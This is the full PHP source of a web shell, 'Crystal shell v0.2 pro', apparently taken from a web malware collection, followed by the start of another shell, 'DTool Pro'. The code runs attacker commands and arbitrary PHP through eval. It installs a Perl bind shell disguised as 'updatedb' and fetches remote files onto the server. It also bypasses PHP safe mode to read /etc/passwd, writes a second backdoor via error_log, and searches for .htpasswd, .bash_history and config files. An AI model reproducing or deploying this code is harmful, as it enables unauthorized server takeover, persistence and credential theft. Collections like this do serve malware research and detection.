CGI v</font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $GATEWAY_INTERFACE; ?>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </font>
<font face=Verdana size=-2 color="#008000">&nbsp;HTTP v</font></a></font><font size="1" face="verdana">:</font><font size="4px" face="verdana" color="DCE7EF"><font face=Verdana size=-2> <?php echo $SERVER_PROTOCOL; ?></font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font face=Verdana size=-2><font size=-2 face=verdana color=#DCE7EF>&nbsp;</font><font size=-2 face=verdana color=#008000>Mail
admin</font></font><font size="1" face="verdana" color="#DCE7EF">:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADMIN; ?>&nbsp;&nbsp;&nbsp;&nbsp; </font><font face=Verdana size=-2 color="black"> &nbsp; </font></a></font>
</font>
</b>
</font></a>&nbsp;&nbsp;<br>
<font size="4px">
<b>
<font size=-2 face=verdana color=white>
<font face=Verdana size=-2 color="#CC0000">
<a bookmark="minipanel" style="font-weight: normal; font-family: verdana; text-decoration: none">
<font face="Wingdings" size="3" color="#000000">:</font></a></font><font size=-2 face=verdana color=#CC0000>&nbsp;&nbsp;</font><font face="Verdana" size="-2" color="#CC0000">IP</font><a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none"><font size="4px" face="verdana" color="white"><font face=Verdana size=-2>
</font><font size="1" face="verdana">&nbsp;</font></font><font size="1" face="verdana" color="#CC0000">SERVER:</font><font face=Verdana size=-2 color="#DCE7EF"> <?php echo $SERVER_ADDR; ?>
</font>
</a>
<font size="4px">
</a>
<font size=-2 face=verdana color=white>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</font></font>
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<font size="4px"><font face=Verdana size=-2 color="black">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
</font>
<font size="4px" face="verdana" color="white"><font face=Verdana size=-2 color="#008000">
port
</font><font size="1" face="verdana" color="#000000">:</font><font face=Verdana size=-2 color="red"> <?php echo $SERVER_PORT; ?>
</font></font>
</font>
</font>
</b>
</font></p></td></tr></table>
<?
if ($act == "help") {echo "<center><b>ÇáÓáÇã Úáíßã æÑÍãÉ Çááå æÈÑßÇÊå<br><br>ÚÒíÒí ÇáãÓÊÎÏã<br>ÇÐÇ ÇÑÏÊ ÇáãÓÇÚÏÉ ÇÖÛØ Úáì ÇÓã ÇáÎíÇÑ ÇáãæÖÍ ÈÇááæä ÇáÇÒÑÞ<br>æÓÊÙåÑ áß ãÚáæãÇÊ ÇáÎíÇÑ </a>.</b>";}
if ($act == "bindport"){
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
<b>/bin/bash</b><input type=\"text\" name=\"installpath\" value=\"" . getcwd() . "\">
<b>Port</b><input type=\"text\" name=\"port\" value=\"3333\">
<INPUT type=\"hidden\" name=\"installbind\" value=\"yes\">
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
<INPUT type=\"submit\" value=\"Connect\"></form></div>";
}
if ($act == "tools"){
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
File to edit:
<input type=\"text\" name=\"editfile\" >
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
<INPUT type=\"submit\" value=\"Edit\"></form></div>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
<table id=tb><tr><td>
<INPUT type=\"hidden\" name=\"php\" value=\"yes\">
<INPUT type=\"submit\" value=\"eval code\" id=input></form></div></td></table>";
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td>Download here <b>from</b>:
<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
<b>-->>:</b>
<INPUT type=\"text\" name=\"fileto\" size=30>
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
<INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
}
if ($act == "about") {echo "<center><b>Coding by:<br><br>Super-Crystal<br>&<br>Mohajer22<br>-----<br>Thanks <br>TrYaG Team <br> ArabSecurityCenter Team <br>CRYSTAL-H Version:0 Beta phpshell code<br>Saudi Arabic </a>.</b>";}
if ($act == "bind") {echo "<center><b>CRYSTAL-H:<br><br>-Connect Þã ÈÇáÖÛØ Úáì ÎíÇÑ.<br>.- ÈÚÏ ãÇíÊã ÇäÒÇá ÇáÓßÑíÈÊ ÈÇáãÌáÏ<br>.-ÊæÌå áÇÏÇÉ ÇáäÊ ßÇÊ æÊÕäÊ Úáì<br>nc -lp 3333ÈßÊÇÈÉ ÇáãäÝÐ - <br>ÇáÓßÑíÈÊ ÈáÛÉ ÇáÈíÑá <br>Bind port to :<br> bind shell æåäíÆÇ ð áß </a>.</b>";}
if ($act == "command") {echo "<center><b>CRYSTAL-H:<br><br>áÃÎÊíÇÑ ÇáÇæÇãÑ ÇáÌÇåÒå Select ------ x ÇÖÛØ Úáì ÇáÎíÇÑ<br>.- æÇÐÇ ÇÑÏÊ ßÊÇÈå ÇáÇæÇãÑ ÈäÝÓß ÞÏ ÊßÊÝí ÈÇáÎíÇÑ<br>Command </a>.</b>";}
if ($act == "team") {echo "<center><b>Arab Security Center Team<br><br>Super-Crystal<br>Medo-HaCKer<br>Anaconda<br>Alsb0r<br> ReeM-HaCK <br>NoOFa <br> AL-Alame<br>The YounG HackeR<br>Anti-Hack<br>Thanks </a>.</b>";}
if (array_key_exists('image', $_GET)) {
header('Content-Type: image/gif');
die(getimage($_GET['image']));
}
if ($act == "bypass") {
echo "
<form action=\"$REQUEST_URI\" method=\"POST\">
<table id=tb><tr><td>Execute:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
";
echo ("<FONT COLOR=\"RED\"> bypass safemode with copy </FONT>");
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td>read file :
<INPUT type=\"text\" name=\"copy\" size=30 value=\"/etc/passwd\">
<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
echo ("<FONT COLOR=\"RED\"> bypass safemode with CuRl</FONT>");
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td>read file :
<INPUT type=\"text\" name=\"curl\" size=30 value=\"/etc/passwd\">
<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
echo ("<FONT COLOR=\"RED\"> bypass safemode with imap()</FONT>");
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td><select name=switch><option value=file>View file</option><option value=dir>View dir</option></select>
<INPUT type=\"text\" name=\"string\" size=30 value=\"/etc/passwd\">
<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
echo ("<FONT COLOR=\"RED\"> bypass safemode with id()</FONT>");
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td>
<select name=plugin><option>cat /etc/passwd</option></select>
<INPUT type=\"submit\" value=\"Show\" id=input></td></tr></table></form></div>";
echo ("<FONT COLOR=\"RED\"> Exploit: error_log()</FONT>");
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td>
<INPUT type=\"text\" name=\"ERORR\" size=30 value=\"\">
<INPUT type=\"submit\" value=\"Write\" id=input></td></tr></table></form></div>";
}
if ($act == "decoder"){
echo ("<FONT COLOR=\"RED\"> replace Chr()</FONT>");
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td>
<textarea name=\"Mohajer22\" cols=\"50\" rows=\"15\" wrar=\"off\">
</textarea><br>
<INPUT type=\"submit\" value=\"Replace\" id=input></td></tr></table></form></div>";
}
if ($act == "SQL"){
echo ("<FONT COLOR=\"RED\"> MySQL </FONT>");
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<table id=tb><tr><td> Username :
<INPUT type=\"text\" name=\"username\" size=30 value=\"\">\n
password :
<INPUT type=\"password\" name=\"password\" size=30 value=\"\">\n
<input type=submit value='Enter'>\n
<input type=reset value='Clear'></td></tr></table></form></div>";
}
?>
<br>
<TABLE style="BORDER-COLLAPSE: collapse; color:#000000" cellSpacing=0 borderColorDark=#DCE7EF cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#C0C0C0 border=1><tr>
<td width="100%" valign="top" style="color: #00000" bgcolor="#000000">
<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
<TABLE style="BORDER-COLLAPSE: collapse; font-family:Verdana; font-size:11px; color:#000000; background-color:#0000000" height=1 cellSpacing=0 borderColorDark=#000000 cellPadding=0 width="100%" bgColor=#000000 borderColorLight=#DCE7EF border=1>
<tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
<td width="990" height="1" valign="top" style="border:1px solid #00000; font-family: Verdana; color: #000000; font-size: 11px; "><p align="center">
&nbsp;</p>
<p align="center">&nbsp;<table style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
<tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
<td style="font-size: 13px; font-family: verdana, arial, helvetica; color: red; background-color: #0000000">
<?php
// chr() //
if(empty($_POST['Mohajer22'])){
} else {
$m=$_POST['Mohajer22'];
$m=str_replace(" ","",$m);
$m=str_replace("(","",$m);
$m=str_replace(")","",$m);
$m=str_replace(".",";",$m);
$m=str_replace("chr","&#",$m);
$m=str_replace(" ","",$m);
echo $m ;
}
// ERORR //
if(empty($_POST['ERORR'])){
} else {
$ERORR=$_POST['ERORR'];
echo error_log("
<html>
<head>
<title> Exploit: error_log() By * Super-Crystal * </title>
<body bgcolor=\"#000000\">
<table Width='100%' height='10%' bgcolor='#8C0404' border='1'>
<tr>
<td><center><font size='6' color='#BBB516'> By * Super-Crystal * TrYaG Team</font></center></td>
</tr>
</table>
<font color='#FF0000'>
</head>
<?
if(\$fileup == \"\"){
ECHO \" reade for up \";
}else{
\$path= exec(\"pwd\");
\$path .= \"/\$fileup_name\";
\$CopyFile = copy(\$fileup,\"\$path\");
if(\$CopyFile){
echo \" up ok \";
}else{
echo \" no up \";
}
}
if(empty(\$_POST['m'])){
} else {
\$m=\$_POST['m'];
echo system(\$m);
}
if(empty(\$_POST['cmd'])){
} else {
\$h= \$_POST['cmd'];
print include(\$h) ;
}
?>
<form method='POST' enctype='multipart/form-data' action='Super-Crystal.php'>
<input type='file' name='fileup' size='20'>
<input type='submit' value=' up '>
</form>
<form method='POST' action='Super-Crystal.php'>
<input type='cmd' name='cmd' size='20'>
<input type='submit' value=' open (shill.txt) '>
</form>
<form method='POST' enctype='multipart/form-data' action='Super-Crystal.php'>
<input type='text' name='m' size='20'>
<input type='submit' value=' run '>
<input type='reset' value=' reset '>
</form>
", 3,$ERORR);
}
// id //
if ($_POST['plugin'] ){
switch($_POST['plugin']){
case("cat /etc/passwd"):
for($uid=0;$uid<6000;$uid++){ //cat /etc/passwd
$ara = posix_getpwuid($uid);
if (!empty($ara)) {
while (list ($key, $val) = each($ara)){
print "$val:";
}
print "<br>";
}
}
break;
}
}
// imap //
$string = !empty($_POST['string']) ? $_POST['string'] : 0;
$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
if ($string && $switch == "file") {
$stream = imap_open($string, "", "");
$str = imap_body($stream, 1);
if (!empty($str))
echo "<pre>".$str."</pre>";
imap_close($stream);
} elseif ($string && $switch == "dir") {
$stream = imap_open("/etc/passwd", "", "");
if ($stream == FALSE)
die("Can't open imap stream");
$string = explode("|",$string);
if (count($string) > 1)
$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
else
$dir_list = imap_list($stream, trim($string[0]), "*");
echo "<pre>";
for ($i = 0; $i < count($dir_list); $i++)
echo "$dir_list[$i]"."<p>&nbsp;</p>" ;
echo "</pre>";
imap_close($stream);
}
// CURL //
if(empty($_POST['curl'])){
} else {
$m=$_POST['curl'];
$ch =
curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
curl_exec($ch);
var_dump(curl_exec($ch));
}
// copy//
$u1p="";
$tymczas="";
if(empty($_POST['copy'])){
} else {
$u1p=$_POST['copy'];
$temp=tempnam($tymczas, "cx");
if(copy("compress.zlib://".$u1p, $temp)){
$zrodlo = fopen($temp, "r");
$tekst = fread($zrodlo, filesize($temp));
fclose($zrodlo);
echo "".htmlspecialchars($tekst)."";
unlink($temp);
} else {
die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
<B>".htmlspecialchars($u1p)."</B> dosen't exists or you don't have
access.</CENTER></FONT>");
}
}
@$dir = $_POST['dir'];
$dir = stripslashes($dir);
@$cmd = $_POST['cmd'];
$cmd = stripslashes($cmd);
$REQUEST_URI = $_SERVER['REQUEST_URI'];
$dires = '';
$files = '';
if (isset($_POST['port'])){
$bind = "
#!/usr/bin/perl
\$port = {$_POST['port']};
\$port = \$ARGV[0] if \$ARGV[0];
exit if fork;
$0 = \"updatedb\" . \" \" x100;
\$SIG{CHLD} = 'IGNORE';
use Socket;
socket(S, PF_INET, SOCK_STREAM, 0);
setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
bind(S, sockaddr_in(\$port, INADDR_ANY));
listen(S, 50);
while(1)
{
accept(X, S);
unless(fork)
{
open STDIN, \"<&X\";
open STDOUT, \">&X\";
open STDERR, \">&X\";
close X;
exec(\"/bin/sh\");
}
close X;
}
";}
function decode($buffer){
return convert_cyr_string ($buffer, 'd', 'w');
}
function execute($com)
{
if (!empty($com))
{
if(function_exists('exec'))
{
exec($com,$arr);
echo implode('
',$arr);
}
elseif(function_exists('shell_exec'))
{
echo shell_exec($com);
}
elseif(function_exists('system'))
{
echo system($com);
}
elseif(function_exists('passthru'))
{
echo passthru($com);
}
}
}
function perms($mode)
{
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
{
copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
}
if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
{
$data = implode("", file($_POST['filefrom']));
$fp = fopen($_POST['fileto'], "wb");
fputs($fp, $data);
$ok = fclose($fp);
if($ok)
{
$size = filesize($_POST['fileto'])/1024;
$sizef = sprintf("%.2f", $size);
print "<center><div id=logostrip>Download - OK. (".$sizef."??)</div></center>";
}
else
{
print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
}
}
if (isset($_POST['installbind'])){
if (is_dir($_POST['installpath']) == true){
chdir($_POST['installpath']);
$_POST['installpath'] = "temp.pl";}
$fp = fopen($_POST['installpath'], "w");
fwrite($fp, $bind);
fclose($fp);
exec("perl " . $_POST['installpath']);
chdir($dir);
}
@$ef = stripslashes($_POST['editfile']);
if ($ef){
$fp = fopen($ef, "r");
$filearr = file($ef);
$string = '';
$content = '';
foreach ($filearr as $string){
$string = str_replace("<" , "&lt;" , $string);
$string = str_replace(">" , "&gt;" , $string);
$content = $content . $string;
}
echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
<input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
fclose($fp);
}
if(isset($_POST['savefile'])){
$fp = fopen($_POST['savefile'], "w");
$content = stripslashes($content);
fwrite($fp, $content);
fclose($fp);
echo "<center><div id=logostrip>saved -OK!</div></center>";
}
if (isset($_POST['php'])){
echo "<center><div id=logostrip>eval code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
<input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
}
if(isset($_POST['phpcode'])){
echo "<center><div id=logostrip>Results of PHP execution<br><br>";
@eval(stripslashes($_POST['phpcode']));
echo "</div></center>";
}
if ($cmd){
if($sertype == "winda"){
ob_start();
execute($cmd);
$buffer = "";
$buffer = ob_get_contents();
ob_end_clean();
}
else{
ob_start();
echo decode(execute($cmd));
$buffer = "";
$buffer = ob_get_contents();
ob_end_clean();
}
if (trim($buffer)){
echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
echo decode($buffer);
echo "</textarea></center></div>";
}
}
$arr = array();
$arr = array_merge($arr, glob("*"));
$arr = array_merge($arr, glob(".*"));
$arr = array_merge($arr, glob("*.*"));
$arr = array_unique($arr);
sort($arr);
echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
foreach ($arr as $filename) {
if ($filename != "." and $filename != ".."){
if (is_dir($filename) == true){
$directory = "";
$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
if (is_writable($filename) == true){
$directory = $directory . "<td>Yes</td>";}
else{
$directory = $directory . "<td>No</td>";
}
if (is_readable($filename) == true){
$directory = $directory . "<td>Yes</td>";}
else{
$directory = $directory . "<td>No</td>";
}
$dires = $dires . $directory;
}
if (is_file($filename) == true){
$file = "";
$file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
if (is_writable($filename) == true){
$file = $file . "<td>Yes</td>";}
else{
$file = $file . "<td>No</td>";
}
if (is_readable($filename) == true){
$file = $file . "<td>Yes</td></td></tr>";}
else{
$file = $file . "<td>No</td></td></tr>";
}
$files = $files . $file;
}
}
}
echo $dires;
echo $files;
echo "</table><br>";
echo "
<form action=\"$REQUEST_URI\" method=\"POST\">
Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">
Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
echo getcwd();
echo "\">
<INPUT type=\"submit\" value=\"..Exec..\"></form>";
if (ini_get('safe_mode') == 1){echo "<br><font size=\"3\"color=\"#cc0000\"><b>SAFE MOD IS ON<br>
Including from here: "
. ini_get('safe_mode_include_dir') . "<br>Exec here: " . ini_get('safe_mode_exec_dir'). "</b></font>";}
?> </td></tr></table></p></td></tr></table></a><br><hr size="1" noshade><b></form></td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
<tr><td width="100%" height="1" valign="top" colspan="2" bgcolor="#000000"><p align="center">
<b>
:: </b>
<font face=Verdana size=-2><a href="?act=command">Executed command</a></font><b> ::</b></p></td></tr><tr><td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000; border: 1px solid #000000"><center><b>
<?
echo "
<form action=\"$REQUEST_URI\" method=\"POST\">
Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">";
?>
<input type="submit" name="submit1" value="Command" style="border: 1px solid #000000"><font face="Wingdings 3" color="#DCE7EF" size="3">f</font></form><p>
&nbsp;</p>
</td>
<td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000"><center>
<form action="?act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="c:/appserv/www/shells/">
<font color="#DCE7EF">Select</font><font face="Wingdings 3" color="#DCE7EF" size="3">g</font><select name="cmd" size="1"><option value="ls -la">
-----------------------------------------------------------</option>
<option value="ls -la /var/lib/mysq">ls MySQL</option>
<option value="which curl">cURL ?</option>
<option value="which wget">Wget ?</option>
<option value="which lynx">Lynx ?</option>
<option value="which links">links ?</option>
<option value="which fetch">fetch ?</option>
<option value="which GET">GET ?</option>
<option value="which per">Perl ?</option>
<option value="gcc --help">C gcc Help ?</option>
<option value="tar --help">tar Help ?</option>
<option value="cat /etc/passwd">Get passwd !!!</option>
<option value="cat /etc/hosts">Get hosts</option>
<option value="perl --help">Perl Help ?</option>
<option value="find / -type f -perm -04000 -ls">
find all suid files</option><option value="find . -type f -perm -04000 -ls">
find suid files in current dir</option><option value="find / -type f -perm -02000 -ls">
find all sgid files</option><option value="find . -type f -perm -02000 -ls">
find sgid files in current dir</option><option value="find / -type f -name config.inc.php">
find config.inc.php files</option><option value="find / -type f -name &quot;config*&quot;">
find config* files</option><option value="find . -type f -name &quot;config*&quot;">
find config* files in current dir</option><option value="find / -perm -2 -ls">
find all writable directories and files</option><option value="find . -perm -2 -ls">
find all writable directories and files in current dir</option><option value="find / -type f -name service.pwd">
find all service.pwd files</option><option value="find . -type f -name service.pwd">
find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd">
find all .htpasswd files</option><option value="find . -type f -name .htpasswd">
find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history">
find all .bash_history files</option><option value="find . -type f -name .bash_history">
find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc">
find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc">
find .fetchmailrc files in current dir</option><option value="lsattr -va">
list file attributes on a Linux second extended file system</option><option value="netstat -an | grep -i listen">
show opened ports</option></select><input type="hidden" name="cmd_txt" value="1">&nbsp;<input type="submit" name="submit" value="Execute" style="border: 1px solid #000000"></form></td></tr></TABLE><a bookmark="minipanel" href="?act=bind"><font face="Verdana" size="-2">Bind port to</font><font face="Webdings" size="5" color="#DCE7EF">Â</font></a><font color="#00FF00"><br>
</font>
<a bookmark="minipanel">
<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
<tr>
<td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><form method="POST">
<p align="center">
<a bookmark="minipanel">
<b><font face="verdana" color="red" size="4">
<a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel">
<font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><a href="?act=edit" bookmark="minipanel"><span lang="en-us"><font face="Verdana" size="2">Edit/Create
file</font></span></a><b><font face="verdana" color="red" size="4"><a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel"><font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><font face="Wingdings 2" size="2">&quot;</font></p><p align="center">
&nbsp;<?
if ($act == "edit") {echo "<center><b>ÇáÊÍÑíÑ æÇáÇäÔÇÁ:<br><br> Þã ÈæÖÚ ÇÓã ÇáãáÝ ÇáÐí ÊÑíÏ ÊÍÑíÑå ÝÞØ<br>æÈÚÏ ÐÇáß ÇáÖÛØ Úáì config.php ãËÇá<br>Edit<br>ÓÊÙåÑ áß äÇÝÐå ÈåÇ ãÍÊæíÇÊ ÇáãáÝ <br>æÇíÖÇ ð ÇÐÇ ÇÑÏÊ ÇäÔÇÁ ãáÝ ÝÞØ ÖÚ ÇÓãå ãÚ ÇáÇãÊÏÇÏ <br>æÈÚÏ ÐÇáß ÇßÊÈ ãÇÊÑíÏ washer-crystal.txt </a>.</b>";}
?>
</p>
<p>&nbsp;</p>
<p> <?
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
File to edit:
<input type=\"text\" name=\"editfile\" >
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
<INPUT type=\"submit\" value=\"Edit\"></form></div>";
?>
</p>
</form></center></p></td>
<td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
<?
if ($act == "upload") {echo "<center><b>ÑÝÚ ÇáãáÝÇÊ:<br><br>Þã ÈÊÍÏíÏ ÇáãáÝ ÇáãÑÇÏ ÑÝÚå <br>æÈÚÏ ÐÇáß Þã ÈÇáÖÛØ Úáì ÇáÎíÇÑ ÇáãæÖÍ<br>UPLOAD< </a>.</b>";}
?><a bookmark="minipanel"><b><font size="2">::
</font>
</b><a href="?act=upload"><span lang="en-us"><font face="Verdana" size="2">
upload</font></span></a><b><font size="2">::</font></b><font face=Webdings size=2>&#325;</font><font size="2"></a></a></font><br><form method="POST" ENCTYPE="multipart/form-data"><input type="hidden" name="miniform" value="1"><input type="hidden" name="act" value="upload">&nbsp;
<?
echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
<INPUT type=\"file\" name=\"userfile\">
<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
<INPUT type=\"submit\" value=\"Download\"></form></div>";
?>
<p></form></p></td>
</tr>
</table> </a><p><br></p><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
<td width="990" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
<b>
&nbsp;</b><font face="Wingdings 3" size="5">y</font><b>Crystal shell v. <span lang="en-us">0.2</span> <span lang="en-us">pro</span>&nbsp; </b><font color="#CC0000"><b>©oded by</b> </font><b><span lang="en-us"><a href="http://www.arab4services.com/home">Arab4Services.Com</a></span> |<span lang="en-us">Super-Crystal</span> </b><font face="Wingdings 3" size="5">x</font></p><p align="center">&nbsp;</p></td></tr></table>
</a>
<div align="right">
<span lang="en-us">&nbsp;</span></div></body></html>

1033
web-malware-collection-13-06-2012/PHP/Cyber Shell (v 1.0).php Normal file
View file

File diff suppressed because it is too large Load diff

198
web-malware-collection-13-06-2012/PHP/DTool Pro.txt Normal file
View file

@ -0,0 +1,198 @@
<?php
if(empty($chdir)) $chdir = @$_GET['chdir'];
if(empty($cmd)) $cmd = @$_GET['cmd'];
if(empty($fu)) $fu = @$_GET['fu'];
if(empty($list)) $list = @$_GET['list'];
if(empty($chdir) or $chdir=='') $chdir=getcwd();
$cmd = stripslashes(trim($cmd));
//CHDIR tool
if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){
$boom = explode(" ",$cmd,2);
$boom2 = explode(";",$boom['1'], 2);
$toDir = $boom2['0'];
if($boom['1']=="/")$chdir="";
else if(strpos($cmd, 'chdir ..')!==false){
$cadaDir = array_reverse(explode("/",$chdir));
if($cadaDir['0']=="" or $cadaDir['0'] ==" ") $lastDir = $cadaDir['1']."/";
else{ $lastDir = $cadaDir['0']."/"; $chdir = $chdir."/";}
$toDir = str_replace($lastDir,"",$chdir);
if($toDir=="/")$chdir="";
}
else if(strpos($cmd, 'chdir .')===0) $toDir = getcwd();
else if(strpos($cmd, 'chdir ~')===0) $toDir = getcwd();
if(strrpos($toDir,"/")==(strlen($toDir)-1)) $toDir=substr($toDir,0,strrpos($toDir,"/"));
if(@opendir($toDir)!==false or @is_dir($toDir)) $chdir=$toDir;
else if(@opendir($chdir."/".$toDir)!==false or @is_dir($chdir."/".$toDir)) $chdir=$chdir."/".$toDir;
else $ch_msg="dtool: line 1: chdir: $toDir: No such directory.\n";
if($boom2['1']==null) $cmd = trim($boom['2']); else $cmd = trim($boom2['1'].$boom2['2']);
if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
}
if(!@opendir($chdir)) $ch_msg="dtool: line 1: chdir: It seems that the permission have been denied in dir '$chdir'. Anyway, you can try to send a command here now. If you haven't accessed it, try to use 'cd' in the cmd line instead.\n";
$cmdShow = $cmd;
//To keep the changes in the url, when using the 'GET' way to send php variables
